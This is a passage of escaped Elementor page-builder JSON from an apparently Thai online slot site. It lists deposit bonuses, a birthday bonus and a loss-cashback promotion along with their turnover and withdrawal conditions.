\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e2b\\u0e32\\u0e22\\u0e2b\\u0e48\\u0e27\\u0e07\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e44\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1a\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e2d\\u0e47\\u0e19\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e17\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e41\\u0e15\\u0e48\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e08\\u0e30\\u0e1b\\u0e31\\u0e07\\u0e41\\u0e04\\u0e48\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e25\\u0e37\\u0e21\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e04\\u0e39\\u0e48\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" 